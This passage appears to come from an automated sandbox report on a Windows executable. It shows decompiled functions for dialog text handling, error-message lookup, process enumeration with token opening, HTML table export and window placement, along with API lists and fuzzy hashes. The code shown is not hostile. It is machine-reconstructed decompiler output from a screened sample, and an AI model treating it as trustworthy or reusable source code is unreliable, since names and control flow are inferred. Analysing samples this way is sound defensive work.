				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}

0x00405241
0x00405250
0x00405257
0x0040525f
0x00405262
0x00405265
0x00405268
0x0040526f
0x0040526f
0x00405277
0x00405277
0x0040527a
0x0040527f
0x00405284
0x00405285
0x00405291
0x00405296
0x004052a9
0x004052b3
0x004052b7
0x004052bc
0x004052ca
0x004052d2
0x004052d5
0x004052d8
0x004052d8
0x004052db
0x004052db
0x004052e1
0x004052e4
0x004052e8
0x004052f2

APIs

memset.MSVCRT ref: 00405257
_snwprintf.MSVCRT ref: 00405285
wcslen.MSVCRT ref: 00405291
memcpy.MSVCRT ref: 004052A9
wcslen.MSVCRT ref: 004052B7
memcpy.MSVCRT ref: 004052CA

Strings

%s (%s), xrefs: 0040527A

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)
API String ID: 3979103747-1363028141
Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}

0x00406157
0x0040616d
0x00406174
0x0040617f
0x00406185
0x00406196
0x0040619e
0x004061b6
0x004061bd
0x004061d4
0x004061da
0x004061e0
0x004061e5
0x004061e6
0x004061ef
0x004061f9
0x004061ff
0x004061ef
0x00406206

APIs

memset.MSVCRT ref: 00406174
GetDlgCtrlID.USER32 ref: 0040617F
GetWindowTextW.USER32 ref: 00406196
memset.MSVCRT ref: 004061BD
GetClassNameW.USER32 ref: 004061D4
_wcsicmp.MSVCRT ref: 004061E6

Part of subcall function 00406025: memset.MSVCRT ref: 00406038
Part of subcall function 00406025: _itow.MSVCRT ref: 00406046

Strings

sysdatetimepick32, xrefs: 004061E0

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
librarywindowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}

0x00404706
0x00404714
0x0040471c
0x00404721
0x0040472b
0x00404733
0x00404735
0x00404735
0x00404733
0x00404751
0x00404780
0x00404753
0x0040475e
0x00404766
0x0040476c
0x00404770
0x00404770
0x0040478a

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
wcslen.MSVCRT ref: 00404756
wcscpy.MSVCRT ref: 00404766
LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
wcscpy.MSVCRT ref: 00404780

Strings

netmsg.dll, xrefs: 00404726

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: netmsg.dll
API String ID: 2767993716-3706735626
Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}

0x0040598b
0x0040598b
0x0040599a
0x004059ae
0x004059b5
0x004059c1
0x004059c6
0x004059cb
0x004059ce
0x00405a7b
0x00405a7b
0x004059d4
0x004059d4
0x004059dc
0x004059ee
0x00000000
0x004059f0
0x004059f0
0x004059f6
0x004059f7
0x004059fa
0x00405a03
0x00405a2b
0x00405a2e
0x00405a3c
0x00405a40
0x00000000
0x00405a42
0x00405a42
0x00405a54
0x00405a59
0x00405a5a
0x00405a5a
0x00405a61
0x00405a69
0x00405a7f
0x00000000
0x00000000
0x00000000
0x00405a69
0x00405a05
0x00405a0e
0x00405a17
0x00000000
0x00405a19
0x00405a19
0x00405a1c
0x00405a1d
0x00405a20
0x00405a29
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a29
0x00405a17
0x00405a03
0x00000000
0x00405a6b
0x00405a6e
0x00405a72
0x00405a72
0x00000000
0x004059d4
0x00405a81
0x00405a84
0x00405a8f

APIs

memset.MSVCRT ref: 004059B5

Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

_wcsicmp.MSVCRT ref: 004059FA
wcschr.MSVCRT ref: 00405A0E
_wcsicmp.MSVCRT ref: 00405A20
OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
CloseHandle.KERNEL32(?), ref: 00405A5A
CloseHandle.KERNEL32(00000000), ref: 00405A61

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
String ID:
API String ID: 768606695-0
Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98

Uniqueness

Uniqueness Score: -1.00%

Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}

0x00407639
0x00407646
0x00407647
0x00407654
0x0040765f
0x0040765f
0x0040766b
0x0040766d
0x00407672
0x00407677
0x0040767d
0x00407680
0x00407686
0x00407691
0x00407697
0x00407699
0x00407699
0x0040769c
0x0040769f
0x004076a3
0x004076a7
0x004076ab
0x004076b5
0x004076be
0x004076c8
0x004076de
0x004076ee
0x004076f1
0x004076f4
0x004076fa
0x00407708
0x0040770e
0x00407718
0x0040771d
0x00407723
0x00407724
0x00407727
0x0040772c
0x0040772f
0x00407734
0x0040773f
0x00407744
0x00407745
0x0040767d
0x00407760

APIs

wcscat.MSVCRT ref: 00407708
_snwprintf.MSVCRT ref: 0040772F

Strings

<td bgcolor=#%s nowrap>%s, xrefs: 00407649
<tr>, xrefs: 00407661
<td bgcolor=#%s>%s, xrefs: 00407657
 , xrefs: 00407702

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}

0x0040605e
0x00406061
0x00406069
0x00406074
0x0040607a
0x0040607e
0x00406082
0x00406148
0x0040614e
0x00000000
0x00000000
0x00000000
0x00406088
0x00406088
0x00406093
0x00406098
0x0040609f
0x004060ae
0x004060b6
0x004060be
0x004060c6
0x004060ca
0x004060cf
0x004060d7
0x00000000
0x00000000
0x004060de
0x00406129
0x00406129
0x0040612d
0x0040612f
0x00406130
0x00406134
0x00406137
0x0040613c
0x0040613c
0x00000000
0x0040612d
0x004060e7
0x004060f0
0x004060f2
0x004060f2
0x004060f9
0x004060fd
0x00406102
0x0040610c
0x00406112
0x00406117
0x00406117
0x00406104
0x00406104
0x00406104
0x00406104
0x00406102
0x00406122
0x00406128
0x00000000
0x0040613f
0x0040613f
0x00406140
0x00000000

APIs

GetMenuItemCount.USER32 ref: 00406074
memset.MSVCRT ref: 00406093
GetMenuItemInfoW.USER32 ref: 004060CF
wcschr.MSVCRT ref: 004060E7

Strings

0, xrefs: 004060AE
6, xrefs: 004060B6

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}

0x00402bee
0x00402bf8
0x00402cae
0x00402c08
0x00402c10
0x00402c11
0x00402c12
0x00402c13
0x00402c20
0x00402c27
0x00402c2e
0x00402c30
0x00402c37
0x00402c4b
0x00402c50
0x00402c53
0x00402c55
0x00402c3e
0x00402c3e
0x00402c41
0x00402c41
0x00402c5a
0x00402c60
0x00402c65
0x00402c68
0x00402c6d
0x00402c77
0x00402c7c
0x00402c7e
0x00402c87
0x00402ca5
0x00402ca5
0x00402c87
0x00402c7c
0x00402c6d
0x00000000
0x00402cac

APIs

GetSystemMetrics.USER32 ref: 00402C1C
GetSystemMetrics.USER32 ref: 00402C23
GetSystemMetrics.USER32 ref: 00402C2A
GetSystemMetrics.USER32 ref: 00402C30
GetSystemMetrics.USER32 ref: 00402C47
GetSystemMetrics.USER32 ref: 00402C4E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$Window
String ID:
API String ID: 1155976603-0
Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}

0x004036ef
0x004036f6
0x0040370b
0x00403712
0x00403717
0x0040371c
0x0040371f
0x0040372c
0x00403735
0x00403738
0x00403744
0x00403751
0x00403758
0x00403760
0x00403769
0x0040376c
0x00403778
0x0040377b
0x0040378b
0x00403792
0x00403795
0x00403798
0x0040379b
0x004037a2
0x004037a5
0x004037a8
0x004037af
0x004037b7
0x004037c3
0x00000000
0x004037d4
0x004037dc

APIs

memset.MSVCRT ref: 004036F6
memset.MSVCRT ref: 00403712

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Part of subcall function 00405236: memset.MSVCRT ref: 00405257
Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA

GetSaveFileNameW.COMDLG32(?), ref: 004037AF
wcscpy.MSVCRT ref: 004037C3

Strings

cfg, xrefs: 00403717
L, xrefs: 0040378B

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
String ID: L$cfg
API String ID: 275899518-3734058911
Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63
timeCOMMON

Download Yara Rule

